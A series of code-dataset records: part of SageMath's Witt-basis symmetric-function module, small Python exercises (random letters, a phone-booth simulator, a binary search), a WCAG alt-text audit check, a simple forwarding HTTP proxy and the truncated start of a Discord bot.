self._from_dict(self._h_to_self_cache[lam])\n\n def _w_to_h_on_basis(self, lam):\n r\"\"\"\n Return the Witt symmetric function ``w[lam]`` expanded in the\n complete homogeneous basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_h`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``w[lam]`` in the complete\n homogeneous basis of ``self.realization_of()``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: h = Sym.homogeneous()\n sage: w = Sym.w()\n sage: w._w_to_h_on_basis(Partition([]))\n h[]\n sage: w._w_to_h_on_basis(Partition([4,2,1]))\n h[1, 1, 1, 1, 1, 1, 1] - 3*h[2, 1, 1, 1, 1, 1] + 3*h[2, 2, 1, 1, 1] - h[2, 2, 2, 1] + h[3, 1, 1, 1, 1] - h[3, 2, 1, 1] - h[4, 1, 1, 1] + h[4, 2, 1]\n sage: w(w._w_to_h_on_basis(Partition([3,1]))) == w[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_h(n)\n return self._h._from_dict(self._h_from_self_cache[lam])\n\n def _e_to_w_on_basis(self, lam):\n r\"\"\"\n Return the elementary symmetric function ``e[lam]`` expanded in\n the Witt basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_e`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``e[lam]`` in the Witt basis ``self``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: e = Sym.elementary()\n sage: w = Sym.w(coerce_e=True)\n sage: w._e_to_w_on_basis(Partition([]))\n w[]\n sage: w._e_to_w_on_basis(Partition([4,2,1]))\n -w[3, 2, 1, 1] + w[4, 2, 1]\n sage: e(w._e_to_w_on_basis(Partition([3,1]))) == e[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_e(n)\n return self._from_dict(self._e_to_self_cache[lam])\n\n def _w_to_e_on_basis(self, lam):\n r\"\"\"\n Return the Witt symmetric function ``w[lam]``\n expanded in the elementary symmetric basis, where\n ``lam`` is a partition.\n\n This assumes that the ``coerce_e`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``w[lam]`` in the elementary\n symmetric basis of ``self.realization_of()``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: e = Sym.elementary()\n sage: w = Sym.w(coerce_e=True)\n sage: w._w_to_e_on_basis(Partition([]))\n e[]\n sage: w._w_to_e_on_basis(Partition([4,2,1]))\n e[2, 2, 1, 1, 1] - e[3, 2, 1, 1] + e[4, 2, 1]\n sage: w(w._w_to_e_on_basis(Partition([3,1]))) == w[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_e(n)\n return self._e._from_dict(self._e_from_self_cache[lam])\n\n def _p_to_w_on_basis(self, lam):\n r\"\"\"\n Return the powersum symmetric function ``p[lam]`` expanded in\n the Witt basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_p`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``p[lam]`` in the Witt basis ``self``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: p = Sym.power()\n sage: w = Sym.w(coerce_p=True)\n sage: w._p_to_w_on_basis(Partition([]))\n w[]\n sage: w._p_to_w_on_basis(Partition([4,2,1]))\n w[1, 1, 1, 1, 1, 1, 1] + 2*w[2, 1, 1, 1, 1, 1] + 2*w[2, 2, 1, 1, 1] + 4*w[2, 2, 2, 1] + 4*w[4, 1, 1, 1] + 8*w[4, 2, 1]\n sage: p(w._p_to_w_on_basis(Partition([3,1]))) == p[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_p(n)\n return self._from_dict(self._p_to_self_cache[lam])\n\n def _w_to_p_on_basis(self, lam):\n r\"\"\"\n Return the Witt symmetric function ``w[lam]`` expanded in the\n powersum basis, where ``lam`` is a partition.\n\n This assumes that the ``coerce_p`` keyword has been set to ``True`` in\n the initialization of ``self`` (otherwise the cache does not exist).\n\n INPUT:\n\n - ``lam`` -- a partition\n\n OUTPUT:\n\n - the expansion of ``w[lam]`` in the powersum\n basis of ``self.realization_of()``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: p = Sym.power()\n sage: w = Sym.w(coerce_p=True)\n sage: w._w_to_p_on_basis(Partition([]))\n p[]\n sage: w._w_to_p_on_basis(Partition([4,2,1]))\n 3/16*p[1, 1, 1, 1, 1, 1, 1] - 5/16*p[2, 1, 1, 1, 1, 1] + 3/16*p[2, 2, 1, 1, 1] - 1/16*p[2, 2, 2, 1] - 1/8*p[4, 1, 1, 1] + 1/8*p[4, 2, 1]\n sage: w(w._w_to_p_on_basis(Partition([3,1]))) == w[3,1]\n True\n \"\"\"\n n = sum(lam)\n self._precompute_p(n)\n return self._p._from_dict(self._p_from_self_cache[lam])\n\n def __init_extra__(self):\n \"\"\"\n Sets up caches for the transition maps to other bases, and registers\n them as coercions.\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ) # indirect doctest\n sage: h = Sym.h(); w = Sym.w()\n\n sage: phi = h.coerce_map_from(w); phi\n Generic morphism:\n From: Symmetric Functions over Rational Field in the Witt basis\n To: Symmetric Functions over Rational Field in the homogeneous basis\n sage: phi(w.an_element()) == h(w.an_element())\n True\n sage: e = Sym.e(); w2 = Sym.w(coerce_e=True)\n sage: psi = e.coerce_map_from(w2); psi\n Generic morphism:\n From: Symmetric Functions over Rational Field in the Witt basis\n To: Symmetric Functions over Rational Field in the elementary basis\n sage: psi(w2.an_element()) == e(w2.an_element())\n True\n \"\"\"\n\n #category = sage.categories.all.ModulesWithBasis(self.base_ring())\n\n # Set up coercions and conversions with appropriate other bases.\n # self._p, self._e and self._h will be the powersum basis, the elementary\n # symmetric basis and the complete homogeneous basis (over the same base\n # ring as self), respectively (but they are only set if the respective\n # arguments ``coerce_p``, ``coerce_e`` and ``coerce_h`` are True).\n # self._friendly will be the one available basis which makes computations\n # the easiest.\n\n self._friendly = None\n\n if self._coerce_p:\n self._p = self.realization_of().p()\n # Set up the cache for conversion from the Witt basis\n # to the powersum basis.\n\n # cache for the coordinates of the elements\n # of the powersum basis with respect to the Witt basis\n self._p_to_self_cache = {}\n # cache for the coordinates of the elements\n # of the Witt basis with respect to the powersum basis\n self._p_from_self_cache = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the powersum basis with respect to the Witt basis\n self._p_transition_matrices = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the Witt basis with respect to the powersum basis\n self._p_inverse_transition_matrices = {}\n\n self.register_coercion(self._p._module_morphism(self._p_to_w_on_basis, codomain=self))\n from sage.rings.rational_field import RationalField\n if self.base_ring().has_coerce_map_from(RationalField):\n self._p.register_coercion(self._module_morphism(self._w_to_p_on_basis, codomain=self._p))\n self._friendly = self._p\n else:\n # self._w_to_p_on_basis is a partial map at best\n self._p.register_conversion(self._module_morphism(self._w_to_p_on_basis, codomain=self._p))\n if (not self._coerce_e) and (not self._coerce_h):\n # ensure that self has coercion at least to one other basis,\n # or else coercion-based computations will fail\n self._coerce_h = True\n elif (not self._coerce_e) and (not self._coerce_h):\n self._coerce_h = True # at least one coercion is needed!\n\n if self._coerce_h:\n self._h = self.realization_of().h()\n # Set up the cache for conversion from the Witt basis to the complete\n # homogeneous basis. (This is the conversion that is used by default.)\n\n # cache for the coordinates of the elements\n # of the homogeneous basis with respect to the Witt basis\n self._h_to_self_cache = {}\n # cache for the coordinates of the elements\n # of the Witt basis with respect to the homogeneous basis\n self._h_from_self_cache = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the homogeneous basis with respect to the Witt basis\n self._h_transition_matrices = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the Witt basis with respect to the homogeneous basis\n self._h_inverse_transition_matrices = {}\n self.register_coercion(self._h._module_morphism(self._h_to_w_on_basis, codomain=self))\n self._h.register_coercion(self._module_morphism(self._w_to_h_on_basis, codomain=self._h))\n if self._friendly is None:\n self._friendly = self._h\n\n if self._coerce_e:\n self._e = self.realization_of().e()\n # Set up the cache for conversion from the Witt basis to the elementary\n # symmetric basis.\n\n # cache for the coordinates of the elements\n # of the elementary basis with respect to the Witt basis\n self._e_to_self_cache = {}\n # cache for the coordinates of the elements\n # of the Witt basis with respect to the elementary basis\n self._e_from_self_cache = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the elementary basis with respect to the Witt basis\n self._e_transition_matrices = {}\n # cache for transition matrices which contain the coordinates of\n # the elements of the Witt basis with respect to the elementary basis\n self._e_inverse_transition_matrices = {}\n self.register_coercion(self._e._module_morphism(self._e_to_w_on_basis, codomain=self))\n self._e.register_coercion(self._module_morphism(self._w_to_e_on_basis, codomain=self._e))\n if self._friendly is None:\n self._friendly = self._e\n\n def from_other_uncached(self, u):\n r\"\"\"\n Return an element ``u`` of another basis of the ring of\n symmetric functions, expanded in the Witt basis ``self``.\n The result is the same as ``self(u)``, but the\n ``from_other_uncached`` method does not precompute a\n cache with transition matrices. Thus,\n ``from_other_uncached`` is faster when ``u`` is sparse.\n\n INPUT:\n\n - ``u`` -- an element of ``self.realization_of()``\n\n OUTPUT:\n\n - the expansion of ``u`` in the Witt basis ``self``\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: p = Sym.p()\n sage: w = Sym.w()\n sage: a = p([3,2]) - p([4,1]) + 27 * p([3])\n sage: w.from_other_uncached(a) == w(a)\n True\n\n Here's a verification of an obvious fact that would take\n long with regular coercion::\n\n sage: fouc = w.from_other_uncached\n sage: fouc(p([15]))\n w[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] + 3*w[3, 3, 3, 3, 3] + 5*w[5, 5, 5] + 15*w[15]\n sage: fouc(p([15])) * fouc(p([14])) == fouc(p([15, 14]))\n True\n\n Other bases::\n\n sage: e = Sym.e()\n sage: h = Sym.h()\n sage: s = Sym.s()\n sage: all( fouc(e(lam)) == w(e(lam)) for lam in Partitions(5) )\n True\n sage: all( fouc(h(lam)) == w(h(lam)) for lam in Partitions(5) )\n True\n sage: all( fouc(p(lam)) == w(p(lam)) for lam in Partitions(5) )\n True\n sage: all( fouc(s(lam)) == w(s(lam)) for lam in Partitions(5) )\n True\n \"\"\"\n parent_name = u.parent().basis_name()\n from sage.misc.cachefunc import cached_function\n\n if parent_name == \"homogeneous\":\n from sage.combinat.partition import Partitions_n\n\n @cached_function\n def wsum(m): # expansion of h_m in w-basis, for m > 0\n return self._from_dict({lam: 1 for lam in Partitions_n(m)})\n result = self.zero()\n for lam, a in u.monomial_coefficients().items():\n product = self.one()\n for i in lam:\n product *= wsum(i)\n result += a * product\n return result\n\n if parent_name == \"powersum\":\n from sage.arith.all import divisors\n from sage.combinat.partition import Partition\n\n @cached_function\n def wsum_p(m): # expansion of p_m in w-basis, for m > 0\n return self._from_dict({Partition([d] * (m // d)): d\n for d in divisors(m)})\n result = self.zero()\n for lam, a in u.monomial_coefficients().items():\n product = self.one()\n for i in lam:\n product *= wsum_p(i)\n result += a * product\n return result\n\n # Coerce u into elementary symmetric basis.\n if parent_name != \"elementary\":\n u = u.parent().realization_of().elementary()(u)\n\n from sage.combinat.partition import Partitions\n\n @cached_function\n def wsum_e(m): # expansion of e_m in w-basis, for m > 0\n return self._from_dict({lam: (-1 if (m + len(lam)) % 2 else 1)\n for lam in Partitions(m, max_slope=-1)})\n result = self.zero()\n for lam, a in u.monomial_coefficients().items():\n product = self.one()\n for i in lam:\n product *= wsum_e(i)\n result += a * product\n return result\n\n def coproduct(self, elt):\n r\"\"\"\n Return the coproduct of the element ``elt``.\n\n INPUT:\n\n - ``elt`` -- a symmetric function written in this basis\n\n OUTPUT:\n\n - The coproduct acting on ``elt``; the result is an element of the\n tensor squared of the basis ``self``\n\n EXAMPLES::\n\n sage: w = SymmetricFunctions(QQ).w()\n sage: w[2].coproduct()\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w.coproduct(w[2])\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w[2,1].coproduct()\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n sage: w.coproduct(w[2,1])\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n\n TESTS:\n\n The same, but with other settings::\n\n sage: w = SymmetricFunctions(QQ).w(coerce_h=False, coerce_e=True)\n sage: w[2].coproduct()\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w.coproduct(w[2])\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w[2,1].coproduct()\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n sage: w.coproduct(w[2,1])\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n\n sage: w = SymmetricFunctions(QQ).w(coerce_h=False, coerce_p=True)\n sage: w[2].coproduct()\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w.coproduct(w[2])\n w[] # w[2] - w[1] # w[1] + w[2] # w[]\n sage: w[2,1].coproduct()\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n sage: w.coproduct(w[2,1])\n w[] # w[2, 1] - w[1] # w[1, 1] + w[1] # w[2] - w[1, 1] # w[1] + w[2] # w[1] + w[2, 1] # w[]\n \"\"\"\n from sage.categories.tensor import tensor\n friendly = self._friendly\n return self.tensor_square().sum(coeff * tensor([self(friendly[x]), self(friendly[y])])\n for ((x,y), coeff) in friendly(elt).coproduct())\n\n def verschiebung(self, n):\n r\"\"\"\n Return the image of the symmetric function ``self`` under the\n `n`-th Verschiebung operator.\n\n The `n`-th Verschiebung operator `\\mathbf{V}_n` is defined to be\n the unique algebra endomorphism `V` of the ring of symmetric\n functions that satisfies `V(h_r) = h_{r/n}` for every positive\n integer `r` divisible by `n`, and satisfies `V(h_r) = 0` for\n every positive integer `r` not divisible by `n`. This operator\n `\\mathbf{V}_n` is a Hopf algebra endomorphism. For every\n nonnegative integer `r` with `n \\mid r`, it satisfies\n\n .. MATH::\n\n \\mathbf{V}_n(h_r) = h_{r/n},\n \\quad \\mathbf{V}_n(p_r) = n p_{r/n},\n \\quad \\mathbf{V}_n(e_r) = (-1)^{r - r/n} e_{r/n},\n \\quad \\mathbf{V}_n(w_r) = w_{r/n},\n\n (where `h` is the complete homogeneous basis, `p` is the\n powersum basis, `e` is the elementary basis, and `w` is the\n Witt basis). For every nonnegative integer `r` with `n \\nmid r`,\n it satisfes\n\n .. MATH::\n\n \\mathbf{V}_n(h_r) = \\mathbf{V}_n(p_r) = \\mathbf{V}_n(e_r)\n = \\mathbf{V}_n(w_r) = 0.\n\n The `n`-th Verschiebung operator is also called the `n`-th\n Verschiebung endomorphism. Its name derives from the Verschiebung\n (German for \"shift\") endomorphism of the Witt vectors.\n\n The `n`-th Verschiebung operator is adjoint to the `n`-th\n Frobenius operator (see :meth:`frobenius` for its definition)\n with respect to the Hall scalar product (:meth:`scalar`).\n\n The action of the `n`-th Verschiebung operator on the Schur basis\n can also be computed explicitly. The following (probably clumsier\n than necessary) description can be obtained by solving exercise\n 7.61 in Stanley's [STA]_.\n\n Let `\\lambda` be a partition. Let `n` be a positive integer. If\n the `n`-core of `\\lambda` is nonempty, then\n `\\mathbf{V}_n(s_\\lambda) = 0`. Otherwise, the following method\n computes `\\mathbf{V}_n(s_\\lambda)`: Write the partition `\\lambda`\n in the form `(\\lambda_1, \\lambda_2, \\ldots, \\lambda_{ns})` for some\n nonnegative integer `s`. (If `n` does not divide the length of\n `\\lambda`, then this is achieved by adding trailing zeroes to\n `\\lambda`.) Set `\\beta_i = \\lambda_i + ns - i` for every\n `s \\in \\{ 1, 2, \\ldots, ns \\}`. Then,\n `(\\beta_1, \\beta_2, \\ldots, \\beta_{ns})` is a strictly decreasing\n sequence of nonnegative integers. Stably sort the list\n `(1, 2, \\ldots, ns)` in order of (weakly) increasing remainder of\n `-1 - \\beta_i` modulo `n`. Let `\\xi` be the sign of the\n permutation that is used for this sorting. Let `\\psi` be the sign\n of the permutation that is used to stably sort the list\n `(1, 2, \\ldots, ns)` in order of (weakly) increasing remainder of\n `i - 1` modulo `n`. (Notice that `\\psi = (-1)^{n(n-1)s(s-1)/4}`.)\n Then, `\\mathbf{V}_n(s_\\lambda) = \\xi \\psi \\prod_{i = 0}^{n - 1}\n s_{\\lambda^{(i)}}`, where\n `(\\lambda^{(0)}, \\lambda^{(1)}, \\ldots, \\lambda^{(n - 1)})`\n is the `n`-quotient of `\\lambda`.\n\n INPUT:\n\n - ``n`` -- a positive integer\n\n OUTPUT:\n\n The result of applying the `n`-th Verschiebung operator (on the ring of\n symmetric functions) to ``self``.\n\n EXAMPLES::\n\n sage: Sym = SymmetricFunctions(ZZ)\n sage: w = Sym.w()\n sage: w[3].verschiebung(2)\n 0\n sage: w[4].verschiebung(4)\n w[1]\n\n TESTS:\n\n Let us check that this method on the Witt basis gives the\n same result as the implementation in sfa.py on the complete\n homogeneous basis::\n\n sage: Sym = SymmetricFunctions(QQ)\n sage: w = Sym.w(); h = Sym.h()\n sage: all( w(h(lam)).verschiebung(3) == w(h(lam).verschiebung(3))\n ....: for lam in Partitions(6) )\n True\n sage: all( h(w(lam)).verschiebung(2) == h(w(lam).verschiebung(2))\n ....: for lam in Partitions(4) )\n True\n \"\"\"\n parent = self.parent()\n w_coords_of_self = self.monomial_coefficients().items()\n from sage.combinat.partition import Partition\n dct = {Partition([i // n for i in lam]): coeff\n for lam, coeff in w_coords_of_self\n if all(i % n == 0 for i in lam)}\n result_in_w_basis = parent._from_dict(dct)\n return result_in_w_basis\n","repo_name":"sagemath/sage-archive-2023-02-01","sub_path":"src/sage/combinat/sf/witt.py","file_name":"witt.py","file_ext":"py","file_size_in_byte":50874,"program_lang":"python","lang":"en","doc_type":"code","stars":2037,"dataset":"github-code","pt":"40"} +{"seq_id":"71984590200","text":"import random as rd\nclass Escribe:\n\n def __init__(self, abecedario=[]):\n if len(abecedario)==0:\n self.abecedario=\\\n [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\n \"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n\n\n def escribir(self,numeroDePalabras=10):\n str=\"\"\n for i in range(0,numeroDePalabras):\n str=str+self.abecedario[rd.randint(0, 25)]\n return str\n\n def divide_str(self,string):\n lista=[]\n for i in range(0,len(string)):\n lista.append(string[i])\n\n return lista\n\n","repo_name":"Rin94/GitChanges","sub_path":"escribe_palabras.py","file_name":"escribe_palabras.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15849704195","text":"import re\nimport sys\n\n#0 => pousada\n#1 => LEVANTADA\n#2 => IN CALL\n#500 => ERRO\n\nclass Telefone:\n status = 0\n moedasExistentes = [1, 2, 5, 10, 20, 50, 100, 200]\n dinheiroAtual = 0\n\n def handle_moedas(self, moedas):\n m = re.compile(\"\\d*[ce]\")\n naoExistentes = []\n for moeda in m.findall(moedas):\n moedaOriginal = moeda\n print(moeda + \" <=> \" + moedaOriginal)\n if 'e' in moeda:\n moeda = int(moeda.replace(\"e\", \"\")) * 100\n moeda = int(moeda.replace(\"c\", \"\"))\n if moeda in self.moedasExistentes:\n self.dinheiroAtual += moeda\n else:\n naoExistentes.append(moedaOriginal)\n\n if len(naoExistentes) > 0:\n return f'{\",\".join(naoExistentes)} - moeda inválida; saldo = {self.getSaldo()}'\n else:\n return f'saldo = {self.getSaldo()}'\n\n def getSaldo(self):\n euros = int(self.dinheiroAtual/100)\n cents = self.dinheiroAtual%100\n return f'{euros:0d}e{cents:02d}c'\n\n def getTroco(self):\n restante = self.dinheiroAtual\n moedas = {'2e': 0, '1e': 0, '50c': 0, '20c': 0, '10c': 0, '5c': 0, '2c': 0, '1c': 0}\n while restante > 0:\n if restante >= 200:\n moedas['2e'] += 1\n restante -= 200\n if restante >= 100:\n moedas['1e'] += 1\n restante -= 100\n if restante >= 50:\n moedas['50c'] += 1\n restante -= 50\n if restante >= 20:\n moedas['20c'] += 1\n restante -= 20\n if restante >= 10:\n moedas['10c'] += 1\n restante -= 10\n if restante >= 5:\n moedas['5c'] += 1\n restante -= 5\n if restante >= 2:\n moedas['2c'] += 1\n restante -= 2\n if restante >= 1:\n moedas['1c'] += 1\n restante -= 1\n return ','.join([str(value) + \"x\" + str(key) for key,value in moedas.items() if value > 0])\n\n def gastaDinheiro(self, valor):\n if self.dinheiroAtual - valor > 0:\n self.dinheiroAtual -= valor\n return True\n return False\n\n def handle_chamada(self, chamada):\n numero = chamada.replace(\"T=\", \"\")\n\n handle_loc = re.search(\"\\d*\", numero)\n handle_int = re.search(\"00\\d*\", numero)\n if handle_int:\n if self.gastaDinheiro(150):\n status = 2\n return \"saldo = \" + self.getSaldo()\n else:\n return \"Não dispõe de dinheiro para efetuar a chamada.\"\n if handle_loc and len(handle_loc.group(0)) == 9:\n handle_loc = handle_loc.group(0)\n print(handle_loc[:4])\n if (handle_loc[:3] == \"601\" or handle_loc[:3] == \"641\") and not self.gastaDinheiro(10):\n return \"Esse número não é permitido neste telefone. Queira discar novo número!\"\n if handle_loc[:3] == \"808\" and not self.gastaDinheiro(10):\n return \"Não dispõe de dinheiro para efetuar a chamada.\"\n if handle_loc[:1] == \"2\" and not self.gastaDinheiro(25):\n return \"Não dispõe de dinheiro para efetuar a chamada.\"\n status = 2\n return \"saldo = \" + self.getSaldo()\n return \"Esse número não é permitido neste telefone. Queira discar novo número!\"\n\n def handle_levantar(self):\n if self.status != 1:\n self.status = 1\n return \"Introduza moedas.\"\n\n def handle_pousar(self):\n self.status = 0\n return f'troco={self.getTroco()}; Volte sempre!'\n\n def handle_input(self, input):\n output = \"maq: ERRO\"\n if re.match(\"T=\\d+\", input):\n output = self.handle_chamada(input)\n if re.match(\"MOEDA \\d*[ce]\", input):\n output = self.handle_moedas(input)\n if input == \"DINHEIRO\":\n print(dinheiroAtual)\n if input == \"LEVANTAR\":\n output = self.handle_levantar()\n if input == \"POUSAR\":\n output = self.handle_pousar()\n if input == \"ABORTAR\":\n print(\"ABORTAR\")\n return f'maq: \"{output}\"'\n\ndef main():\n print('maq: \"Bem-vindo à cabine telefónica!\"')\n t = Telefone()\n while True:\n line = input().strip()\n if not line:\n continue\n output = t.handle_input(line)\n print(output)\n if output == -1:\n print('maq: \"Até a próxima ligação!\"')\n break\n\nif __name__ == \"__main__\":\n main()","repo_name":"LuisFilipe6/PL2023","sub_path":"TPC5/tpc5.py","file_name":"tpc5.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74512281721","text":"import sys\nN, M = map(int, input().split())\nricecake = list(map(int, input().split()))\nricecake.sort()\nl, r = 0, ricecake[-1]\nmax_h = 0\nwhile l <= r:\n mid = (l+r)//2\n cnt = 0\n for r in ricecake:\n if r > mid: cnt += r-mid\n if cnt == M:\n max_h = mid\n break\n elif cnt < M:\n r = mid-1\n else:\n max_h = mid # 최대한 덜 잘랐을 때가 정답이니까 기록해두기\n l = mid+1\nprint(max_h)","repo_name":"gyoforit/study-algorithm","sub_path":"etc/binarysearch_떡볶이떡만들기.py","file_name":"binarysearch_떡볶이떡만들기.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14732399178","text":"from audit.ask import ask\nfrom audit.results import AXSFailure\nfrom audit.techniques.base import Technique\n\n\nclass F30(Technique):\n code = \"F30\"\n code_description = \"Failure of Success Criterion 1.1.1 and 1.2.1 due to using text alternatives that are not alternatives (e.g., filenames or placeholder text)\"\n reading = \"https://www.w3.org/WAI/WCAG21/Techniques/failures/F30\"\n\n \"\"\"\n Check each text alternative to see if it is not actually a text alternative for the non-text content.\n \"\"\"\n\n def test(self, element):\n alt_text = element.get_attribute(\"alt\")\n if alt_text:\n human_answer = ask(\n element,\n f\"The alt text of this element is: '{alt_text}'. Is this alt text a placeholder? E.g. 'picture', '0001', 'chart.jpg'.\",\n (\"Y\", \"Yes\"),\n (\"N\", \"No\"),\n )\n if human_answer == \"Y\":\n # not good\n yield AXSFailure(\n self.code,\n \"Using text alternatives that are not alternatives (e.g., filenames or placeholder text)\",\n element,\n )\n","repo_name":"DiversityandAbility/axs-audit","sub_path":"audit/techniques/failures/F30.py","file_name":"F30.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44295684785","text":"#!/usr/bin/env python3\n# coding=utf-8\nimport socket\nimport select\nimport logging\nimport os\nimport re\nimport time\n\nimport chardet\n\nlogsDir = \"logs\"\nif not os.path.isdir(logsDir):\n os.mkdir(logsDir)\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='logs/logs.log',\n filemode='a')\n\n# C的IP和端口\nto_addr = ('0.0.0.0', 8889)\n\ndef getAddr(d):\n a = re.search(\"Host: (.*)\\r\\n\", d)\n host = a.group(1)\n a = host.split(\":\")\n if len(a) == 1:\n return (a[0], 80)\n else:\n return (a[0], int(a[1]))\n\n\nclass Proxy:\n def __init__(self, addr):\n self.proxy = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.proxy.bind(addr)\n self.proxy.listen(10)\n self.inputs = [self.proxy]\n self.route = {}\n\n def serve_forever(self):\n logging.info('proxy listen...')\n while 1:\n readable, _, _ = select.select(self.inputs, [], [])\n for self.sock in readable:\n if self.sock == self.proxy:\n self.on_join()\n else:\n try:\n data = self.sock.recv(8192)\n except Exception as e:\n logging.error(str(e))\n self.on_quit()\n continue\n\n if not data:\n self.on_quit()\n else:\n try:\n self.route[self.sock].send(data)\n except Exception as e:\n logging.error(str(e))\n self.on_quit()\n continue\n\n def on_join(self):\n client, addr = self.proxy.accept()\n logging.info(\"proxy client \" + str(addr) + 'connect')\n data = client.recv(4096)\n if data:\n # 拆分头信息\n charset = chardet.detect(data)[\"encoding\"]\n host_url = data.decode(charset).split(\"\\r\\n\")[0].split(\" \")\n method, host_addr, protocol = map(lambda x: x.strip(), host_url)\n # 如果 CONNECT 代理方式\n if method == \"CONNECT\":\n host, port = host_addr.split(\":\")\n else:\n host_addr = data.decode(charset).split(\"\\r\\n\")[1].split(\":\")\n # 如果未指定端口则为默认 80\n if 2 == len(host_addr):\n host_addr.append(\"80\")\n name, host, port = map(lambda x: x.strip(), host_addr)\n # 建立 socket tcp 连接\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, int(port)))\n self.inputs.append(sock)\n if method == \"CONNECT\":\n start_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(time.time()))\n self.sock.sendall(bytes(\n \"HTTP/1.1 200 Connection Established\\r\\nFiddlerGateway: Direct\\r\\nStartTime: {0}\\r\\nConnection: close\\r\\n\\r\\n\".format(\n start_time), charset))\n else:\n forward = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n addr = getAddr(data.decode(charset))\n forward.connect(addr)\n self.inputs += [client, forward]\n self.route[client] = forward\n self.route[forward] = client\n\n # 删除连接\n\n def on_quit(self):\n ls = [self.sock]\n if self.sock in self.route:\n ls.append(self.route[self.sock])\n for s in ls:\n if s in self.inputs:\n self.inputs.remove(s)\n if s in self.route:\n del self.route[s]\n s.close()\n\n\nif __name__ == \"__main__\":\n try:\n Proxy(('', 8888)).serve_forever()\n except KeyboardInterrupt:\n logging.error(\"KeyboardInterrupt\")","repo_name":"zhanghtt/crawl-new2","sub_path":"projects/sniffer/proxyserver5.py","file_name":"proxyserver5.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28305106219","text":"import importlib\nimport os\nimport os.path\nimport traceback\nimport sys\nimport json\nimport discord\nimport sqlite3\nimport asyncio\nfrom discord import Game, DMChannel, Embed\nfrom discord.ext import commands\nfrom datetime import datetime\nfrom util import utils, vars, db\nfrom util.prefix_manager import PrefixManager\n\nintents = discord.Intents.none()\nintents.guilds = True\nintents.members = True\nintents.bans = True\nintents.emojis = True\nintents.voice_states = True\nintents.presences = True\nintents.messages = True\nintents.message_content = True\nintents.guild_messages = True\nintents.dm_messages = True\nintents.reactions = True\nintents.guild_reactions = True\n\n\nclass Eschamali(commands.Bot):\n def __init__(self):\n self.config = {}\n self.pm = PrefixManager(self)\n self.start_time = datetime.now()\n self.tbs = []\n self.utils = utils\n self.vars = vars\n self.db = db\n with open(self.vars.CONFIG_FILE) as f:\n self.config = json.load(f)\n super().__init__(command_prefix=self.pm.get_prefix,\n 